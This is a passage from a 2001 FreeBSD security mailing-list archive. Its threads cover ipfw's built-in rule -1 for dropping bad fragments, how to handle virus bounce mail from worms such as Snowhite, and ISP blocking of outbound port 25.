14, 2001 at 01:28:59AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Mar 14, 2001 at 01:28:59AM -0600, Chris Byrnes wrote: > I think it'd be nice to see it in the manpage right underneath the "Fine > Point" you pasted. I agree, as there's no indication from the ipfw log that it was that case that triggered it. -- Alan Batie ______ www.rdrop.com/users/alan Me alan@batie.org \ / www.qrd.org The Triangle PGPFP DE 3C 29 17 C0 49 7A \ / www.pgpi.com The Weird Numbers 27 40 A5 3C 37 4A DA 52 B9 \/ www.anti-spam.net NO SPAM! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 5: 8:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231]) by hub.freebsd.org (Postfix) with ESMTP id 4979B37B71A for ; Wed, 14 Mar 2001 05:08:19 -0800 (PST) (envelope-from bmw@borderware.com) From: "Bruce M. Walker" Message-Id: <200103141308.f2ED84E11909@fusion.borderware.com> Subject: Re: Sophos and Virus return mail In-Reply-To: from Jim Durham at "Mar 13, 2001 11:54:01 pm" To: Jim Durham Date: Wed, 14 Mar 2001 08:08:04 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL66 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jim Durham wrote: > > I thought of rewriting the script to use the "From: " address > to reply. I think that would usually work, but I'm not sure > that address always appears either. Unhappily not: From: Hahaha You can see the IP of the host that sent it to you in the Received: headers if you inspect them, but that will be simply the Windows PC that itself has been infected. Snowhite contains a complete SMTP send-only implementation and it delivers to its targets directly. I'm afraid you're stuck with these things. (This is one case where blocking of port 25 by ISPs is a good thing.) -bmw To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 5:27:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 4C1E637B71A for ; Wed, 14 Mar 2001 05:27:39 -0800 (PST) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id IAA06919; Wed, 14 Mar 2001 08:42:23 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Wed, 14 Mar 2001 08:42:23 -0500 (EST) From: Ralph Huntington To: "Bruce M. Walker" Cc: Jim Durham , freebsd-security@FreeBSD.ORG Subject: Re: Sophos and Virus return mail In-Reply-To: <200103141308.f2ED84E11909@fusion.borderware.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > (This is one case where blocking of port 25 by ISPs is a good thing.) If port 25 is blocked, then how is legitimate mail accepted? -=r=- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 5:33:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231]) by hub.freebsd.org (Postfix) with ESMTP id 83D6537B719 for ; Wed, 14 Mar 2001 05:33:11 -0800 (PST) (envelope-from bmw@borderware.com) From: "Bruce M. Walker" Message-Id: <200103141333.f2EDX0J19096@fusion.borderware.com> Subject: Re: Sophos and Virus return mail In-Reply-To: from Ralph Huntington at "Mar 14, 2001 08:42:23 am" To: Ralph Huntington Date: Wed, 14 Mar 2001 08:33:00 -0500 (EST) Cc: "Bruce M. Walker" , Jim Durham , freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL66 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ralph Huntington wrote: > > (This is one case where blocking of port 25 by ISPs is a good thing.) > > If port 25 is blocked, then how is legitimate mail accepted? -=r=- [The instant I hit the "send" key, I knew I should have clarified! :-] I meant, of course, blocking of port 25 to all destinations but the "officially sanctioned mail server". ISPs generally provide you with a mail server IP which you are supposed to forward all mail to. Forcing all customers to go through that helps (a little) to prevent spamming via open relays. Yes, it annoys some, but clients with dynamic addresses on DSL/cable modems usually don't care. (Veering dangerously OT now...) -bmw To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 6:27:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 7EB7F37B718 for ; Wed, 14 Mar 2001 06:27:55 -0800 (PST) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id JAA08446; Wed, 14 Mar 2001 09:42:54 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Wed, 14 Mar 2001 09:42:54 -0500 (EST) From: Ralph Huntington To: "Bruce M. Walker" Cc: Jim Durham , freebsd-security@FreeBSD.ORG Subject: Re: Sophos and Virus return mail In-Reply-To: <200103141333.f2EDX0J19096@fusion.borderware.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > (This is one case where blocking of port 25 by ISPs is a good thing.) > > > > If port 25 is blocked, then how is legitimate mail accepted? -=r=- > > I meant, of course, blocking of port 25 to all destinations but the > "officially sanctioned mail server". ISPs generally provide you > with a mail server IP which you are supposed to forward all mail > to. Forcing all customers to go through that helps (a little) to > prevent spamming via open relays. Yes, it annoys some, but clients > with dynamic addresses on DSL/cable modems usually don't care. Okay, so you meant blocking the 'escape' of packets bound for port 25 on any machine *other*than* the approved smtp host, which, of course, does not relay, correct? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 6:59:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231]) by hub.freebsd.org (Postfix) with ESMTP id 1947037B71B for ; Wed, 14 Mar 2001 06:59:30 -0800 (PST) (envelope-from bmw@borderware.com) From: "Bruce M. Walker" Message-Id: <200103141459.f2EExFI21502@fusion.borderware.com> Subject: Re: Sophos and Virus return mail In-Reply-To: from Ralph Huntington at "Mar 14, 2001 09:42:54 am" To: Ralph Huntington Date: Wed, 14 Mar 2001 09:59:15 -0500 (EST) Cc: "Bruce M. Walker" , Jim Durham , freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL66 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ralph Huntington wrote: > > > If port 25 is blocked, then how is legitimate mail accepted? -=r=- > > > > I meant, of course, blocking of port 25 to all destinations but the > > "officially sanctioned mail server". ISPs generally provide you > > with a mail server IP which you are supposed to forward all mail > > to. > > Okay, so you meant blocking the 'escape' of packets bound for port 25 on > any machine *other*than* the approved smtp host, which, of course, does > not relay, correct? Not *quite*: the approved SMTP mail server *must* be able to relay, otherwise you (the customer) wouldn't be able to address mail to anybody other than people with addresses at your ISP. Maybe the context isn't clear: I'm referring to blocking being done by your ISP (ie: your employer, your upstream provider, whatever). This hypothetical ISP will filter packets destined for port 25 at any IP-addr except for connections to, say, mail.big-isp.net, their own mailserver. Then they instruct you (the customer) that when you setup MS Lookout! or Eudora, that you must specify mail.big-isp.net as the SMTP server. Your mail client then forwards all outgoing mail to mail.big-isp.net, and that server forwards your mail to the actual destination. So mail.big-isp.net gets all the outgoing mail traffic from the entire ISP's user community and forwards it to the addressees. Nobody is allowed (in this gated community :-) to connect SMTP directly from their Windoze box to the remote mailserver (or MX host) of their addressee. An example, I believe, is Mindspring who recently announced that they would start blocking outgoing attempts to connect to port 25. The point is to stop spammers in their user community from abusing open relays. Now, how did this go from "Snowhite and the Empty Envelope-from" to "Packet-filtering by the Big Bad Wolf"? :-) -bmw To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 8: 6: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 9606637B718 for ; Wed, 14 Mar 2001 08:05:58 -0800 (PST) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id IAA47316; Wed, 14 Mar 2001 08:05:25 -0800 (PST) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <200103141605.IAA47316@gndrsh.dnsmgr.net> Subject: Re: ipfw rule -1? In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com> from "Crist J. Clark" at "Mar 13, 2001 11:20:14 pm" To: cjclark@alum.mit.edu Date: Wed, 14 Mar 2001 08:05:25 -0800 (PST) Cc: alan@batie.org (Alan Batie), security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote: > > I'm seeing a few of these in my ipfw log and was wondering what rule -1 is? > > I couldn't find anything about it in the man page... > > > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > The manpage does not go as far as to indicate that this is rule -1, > but it does say this happens, > > FINE POINTS > o There is one kind of packet that the firewall will always discard, > that is a TCP packet's fragment with a fragment offset of one. This > is a valid packet, but it only has one use, to try to circumvent > firewalls. > > Rule -1 is given for any packet dropped, but not dropped due to a user > rule or the default rule. A quick look at the souce indicates the > above pseudo-rule and some other fragment issues (bogusfrag) are the > only such situations. > > OK, I've answered this one enough times now. Should I send in a PR > with patch to the manpage or is this for the FAQ? Patch the manpage, and the FAQ. Specifically mention the rule number -1 as being a builtin unalterable set of rules, and describe exactly what those rules are. Thanks, -- Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 8:12:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from orestes.cs.brandeis.edu (orestes.cs.brandeis.edu [129.64.3.188]) by hub.freebsd.org (Postfix) with ESMTP id 6481237B718 for ; Wed, 14 Mar 2001 08:12:45 -0800 (PST) (envelope-from meshko@orestes.cs.brandeis.edu) Received: from localhost (meshko@localhost) by orestes.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id LAA03889; Wed, 14 Mar 2001 11:12:29 -0500 Date: Wed, 14 Mar 2001 11:12:29 -0500 (EST) From: Mikhail Kruk To: "Rodney W. Grimes" Cc: , Alan Batie , Subject: Re: ipfw rule -1? In-Reply-To: <200103141605.IAA47316@gndrsh.dnsmgr.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Rule -1 is given for any packet dropped, but not dropped due to a user > > rule or the default rule. A quick look at the souce indicates the > > above pseudo-rule and some other fragment issues (bogusfrag) are the > > only such situations. > > > > OK, I've answered this one enough times now. Should I send in a PR > > with patch to the manpage or is this for the FAQ? > > Patch the manpage, and the FAQ. Specifically mention the rule number -1 > as being a builtin unalterable set of rules, and describe exactly what those > rules are. Looks like a docs thread, not a security, but I'll stick my 2 cents... I don't think that something that is in a man page and can be easily found in it without even reading the whole thing (search for -1?) belongs to the FAQ. FAQ is for problems which are not easily solved using man because it's unclear where to look for the answer, IMHO. I vote for man page only. > Thanks, > -- > Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 8:30:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 7B0F237B719 for ; Wed, 14 Mar 2001 08:30:40 -0800 (PST) (envelope-from durham@w2xo.pgh.pa.us) Received: from shazam (shazam [192.168.5.3]) by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2EGTmq44176; Wed, 14 Mar 2001 16:29:52 GMT (envelope-from durham@w2xo.pgh.pa.us) Date: Wed, 14 Mar 2001 11:31:05 -0500 (EST) From: Jim Durham X-Sender: durham@shazam.int To: "Bruce M. Walker" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sophos and Virus return mail In-Reply-To: <200103141308.f2ED84E11909@fusion.borderware.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 14 Mar 2001, Bruce M. Walker wrote: > Jim Durham wrote: > > > > I thought of rewriting the script to use the "From: " address > > to reply. I think that would usually work, but I'm not sure > > that address always appears either. > > Unhappily not: > > From: Hahaha > > You can see the IP of the host that sent it to you in the Received: > headers if you inspect them, but that will be simply the Windows > PC that itself has been infected. Snowhite contains a complete > SMTP send-only implementation and it delivers to its targets directly. > > I'm afraid you're stuck with these things. > > (This is one case where blocking of port 25 by ISPs is a good thing.) > > -bmw Yes, SnowWhite is probably a bad example, as, like you say, it doesn't generate a replyable "From:" address. I didn't ask my question correctly. Some Viruses generate no envelope "from" but *do* generate a "From: ". I was thinking about the ramifications of changing the script to use the "From: " if the envelope is not there. SO... if (from)... reply to from else if (From: ) reply to From: else reply to MAILER-DAEMON (sigh...) Another thing that might be done is ... and I've done this by hand a couple times, which gets old... dig out the "ppp-4027dialup@bigisp.net" and the time from the headers and generate a reply to: "abuse@bigisp.net". Giving the time of the abuse and the dialup. Maybe if we started using Sadly, I don't think ISPs pay much attention to "abuse" e-mail, though. (Another sigh). I've never gotten a response to an abuse report. This "Virus in your mail to:" stuff gets old.. Yes, I knew what you meant about port 25.. no need to explain. Brains are much faster than fingers.. Jim Durham To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 8:36:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 7C31537B71A for ; Wed, 14 Mar 2001 08:36:51 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA49036; Wed, 14 Mar 2001 11:36:37 -0500 (EST) (envelope-from wollman) Date: Wed, 14 Mar 2001 11:36:37 -0500 (EST) From: Garrett Wollman Message-Id: <200103141636.LAA49036@khavrinen.lcs.mit.edu> To: Jim Durham Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sophos and Virus return mail In-Reply-To: References: <200103141308.f2ED84E11909@fusion.borderware.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > if (from)... reply to from > else if (From: ) reply to From: > else reply to MAILER-DAEMON (sigh...) Better choice: send_notice_to(envelope_destination); drop_message(); -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 8:45:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 546D437B71A for ; Wed, 14 Mar 2001 08:45:12 -0800 (PST) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id IAA47445; Wed, 14 Mar 2001 08:45:00 -0800 (PST) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <200103141645.IAA47445@gndrsh.dnsmgr.net> Subject: Re: ipfw rule -1? In-Reply-To: from Mikhail Kruk at "Mar 14, 2001 11:12:29 am" To: meshko@cs.brandeis.edu (Mikhail Kruk) Date: Wed, 14 Mar 2001 08:45:00 -0800 (PST) Cc: cjclark@alum.mit.edu, alan@batie.org (Alan Batie), security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > Rule -1 is given for any packet dropped, but not dropped due to a user > > > rule or the default rule. A quick look at the souce indicates the > > > above pseudo-rule and some other fragment issues (bogusfrag) are the > > > only such situations. > > > > > > OK, I've answered this one enough times now. Should I send in a PR > > > with patch to the manpage or is this for the FAQ? > > > > Patch the manpage, and the FAQ. Specifically mention the rule number -1 > > as being a builtin unalterable set of rules, and describe exactly what those > > rules are. > > Looks like a docs thread, not a security, but I'll stick my 2 cents... > I don't think that something that is in a man page and can be easily found > in it without even reading the whole thing (search for -1?) belongs to the > FAQ. FAQ is for problems which are not easily solved using man because > it's unclear where to look for the answer, IMHO. > I vote for man page only. 90% of what is in the FAQ can be found in man pages. If we apply your reasoning to the FAQ we could reduce it to 1/10th it's current size :-) -- Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 12:16:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 899F137B71A for ; Wed, 14 Mar 2001 12:16:40 -0800 (PST) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 5833 invoked by uid 0); 14 Mar 2001 20:16:38 -0000 Received: from p3ee20a8c.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.140) by mail.gmx.net (mp022-rz3) with SMTP; 14 Mar 2001 20:16:38 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id TAA22480 for freebsd-security@freebsd.org; Wed, 14 Mar 2001 19:18:31 +0100 Date: Wed, 14 Mar 2001 19:18:31 +0100 From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: ICMP attacks Message-ID: <20010314191831.W20830@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: <980521178.3a7190da7ba07@mail.marketnews.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from mit@mitayai.net on Wed, Mar 14, 2001 at 02:29:17AM -0500 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Mar 14, 2001 at 02:29 -0500, Will Mitayai Keeso Rowe wrote: > > i'd love to use snort, but i keep getting this: > > [castle:root]/usr/ports/security/snort# make -DWITH_MYSQL=yes clean install > ===> Cleaning for snort-1.7 > ===> Extracting for snort-1.7 > >> Checksum OK for snort-1.7.tar.gz. > > gzip: stdout: Broken pipe > ===> Patching for snort-1.7 > ===> Configuring for snort-1.7 > This is only a problem *if* the configure / build steps fail, too. But if they do, you should cite _these_ messages. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 13:11: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.ruhr.de (in-ruhr4.ruhr.de [212.23.134.2]) by hub.freebsd.org (Postfix) with SMTP id D7C8937B71C for ; Wed, 14 Mar 2001 13:10:56 -0800 (PST) (envelope-from ue@nathan.ruhr.de) Received: (qmail 3421 invoked by uid 10); 14 Mar 2001 21:10:54 -0000 Received: (from ue@localhost) by nathan.ruhr.de (8.11.3/8.11.2) id f2EL6EL94714 for security@FreeBSD.ORG; Wed, 14 Mar 2001 22:06:14 +0100 (CET) (envelope-from ue) Date: Wed, 14 Mar 2001 22:06:14 +0100 From: Udo Erdelhoff To: security@FreeBSD.ORG Subject: Re: ipfw rule -1? Message-ID: <20010314220613.L83336@nathan.ruhr.de> Mail-Followup-To: security@FreeBSD.ORG References: <20010313084020.A5859@agora.rdrop.com> <20010313232014.B496@cjc-desktop.users.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com>; from cjclark@reflexnet.net on Tue, Mar 13, 2001 at 11:20:14PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 13, 2001 at 11:20:14PM -0800, Crist J. Clark wrote: > Rule -1 is given for any packet dropped, but not dropped due to a user > rule or the default rule. A quick look at the souce indicates the > above pseudo-rule and some other fragment issues (bogusfrag) are the > only such situations. Hmm, I have the following setup: A -current box mounts /usr/src5 and /usr/obj5 via NFS from a RELENG_4 box. Doing "make installworld" fails as soon there's a fragmented NFS packet - the fragments are dropped by rule -1. I switched to a kernel without ipfw to be able to complete the installworld. The kernel was PRE_SMPNG. Were there any bugfixes in this area or should I try to reproduce the problem with a current -current? /s/Udo -- I figure that if the burned hand teaches best, then the entire scorched epidermis simply has to get its point across. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 14:14:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id 154C737B718 for ; Wed, 14 Mar 2001 14:14:44 -0800 (PST) (envelope-from sziszi@petra.hos.u-szeged.hu) Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id XAA02100; Wed, 14 Mar 2001 23:14:42 +0100 (MET) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 14dJXW-0004EX-00 for ; Wed, 14 Mar 2001 23:14:42 +0100 Date: Wed, 14 Mar 2001 23:14:42 +0100 From: Szilveszter Adam To: freebsd-security@FreeBSD.ORG Subject: Re: Sophos and Virus return mail Message-ID: <20010314231442.F12391@petra.hos.u-szeged.hu> Mail-Followup-To: Szilveszter Adam , freebsd-security@FreeBSD.ORG References: <200103141333.f2EDX0J19096@fusion.borderware.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200103141333.f2EDX0J19096@fusion.borderware.com>; from bmw@borderware.com on Wed, Mar 14, 2001 at 08:33:00AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Ralph Huntington wrote: > > > (This is one case where blocking of port 25 by ISPs is a good thing.) Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits of such a setup right now. While we are at it, why not firewall off the whole Net by just allowing a few things through proxies like www and ftp just so that a few morons are safe? Anyways, who would use such esoteric things as "cvsps" or "cvsup" and what are these etc. You can see where this is leading. Unfortunately network administration only looks simple if you are the one sitting at the admin console. Otherwise, it can quickly become a set of annoying limitations that hinder you @work or @play. Cool. I really feel like paying a lot for Internet access with these conditions. In the meantime, I guess most virus infections are due to the fact that (l)users go to really great lenghts to open anything that says "Big tits inside" or "Check out this nice music." today, it's email. Tomorrow, it will likely be mobile devices. The day after tomorrow... who knows? Sorry for the OT, but I really felt I needed to tell this some time... not all FreeBSD/UNIX afficionados are sysops at the same time, much less network ops at their place. -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 15:47:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id 314E737B77B for ; Wed, 14 Mar 2001 15:47:51 -0800 (PST) (envelope-from meshko@daedalus.cs.brandeis.edu) Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id SAA03451; Wed, 14 Mar 2001 18:47:45 -0500 Date: Wed, 14 Mar 2001 18:47:45 -0500 (EST) From: Mikhail Kruk To: Szilveszter Adam Cc: Subject: Re: Sophos and Virus return mail In-Reply-To: <20010314231442.F12391@petra.hos.u-szeged.hu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Ralph Huntington wrote: > > > > (This is one case where blocking of port 25 by ISPs is a good thing.) > > Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits > of such a setup right now. While we are at it, why not firewall off the > whole Net by just allowing a few things through proxies like www and ftp > just so that a few morons are safe? Anyways, who would use such esoteric > things as "cvsps" or "cvsup" and what are these etc. You can see where this > is leading. Unfortunately network administration only looks simple if you > are the one sitting at the admin console. Otherwise, it can quickly become > a set of annoying limitations that hinder you @work or @play. Cool. I > really feel like paying a lot for Internet access with these conditions. My DSL provider, Mindspring, blocks port 25 and I am quite happy about it. Of course send-pr doesn't work out of the box, but you can configure everything to work through their mail server. Blocking one port is very far from blocking all ports except 80, it's a bad analogy. This measure is directed at a very specific kind of activity (spamming) and does not affect vast majority of the users. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 16:41: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 53C1D37B718 for ; Wed, 14 Mar 2001 16:41:01 -0800 (PST) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id TAA24722; Wed, 14 Mar 2001 19:55:59 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Wed, 14 Mar 2001 19:55:59 -0500 (EST) From: Ralph Huntington To: Mikhail Kruk Cc: Szilveszter Adam , freebsd-security@FreeBSD.ORG Subject: Re: Sophos and Virus return mail In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org No, Ralph Huntington did not write that. He responded to that, as you have done. Someone else said that about port 25 and ISPs. So] let's drop it already. On Wed, 14 Mar 2001, Mikhail Kruk wrote: > > > Ralph Huntington wrote: > > > > > (This is one case where blocking of port 25 by ISPs is a good thing.) > > > > Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits > > of such a setup right now. While we are at it, why not firewall off the > > whole Net by just allowing a few things through proxies like www and ftp > > just so that a few morons are safe? Anyways, who would use such esoteric > > things as "cvsps" or "cvsup" and what are these etc. You can see where this > > is leading. Unfortunately network administration only looks simple if you > > are the one sitting at the admin console. Otherwise, it can quickly become > > a set of annoying limitations that hinder you @work or @play. Cool. I > > really feel like paying a lot for Internet access with these conditions. > > My DSL provider, Mindspring, blocks port 25 and I am quite happy about it. > Of course send-pr doesn't work out of the box, but you can configure > everything to work through their mail server. Blocking one port is very > far from blocking all ports except 80, it's a bad analogy. This measure is > directed at a very specific kind of activity (spamming) and does not > affect vast majority of the users. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 18: 5:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13]) by hub.freebsd.org (Postfix) with ESMTP id CFB7937B71A for ; Wed, 14 Mar 2001 18:05:39 -0800 (PST) (envelope-from 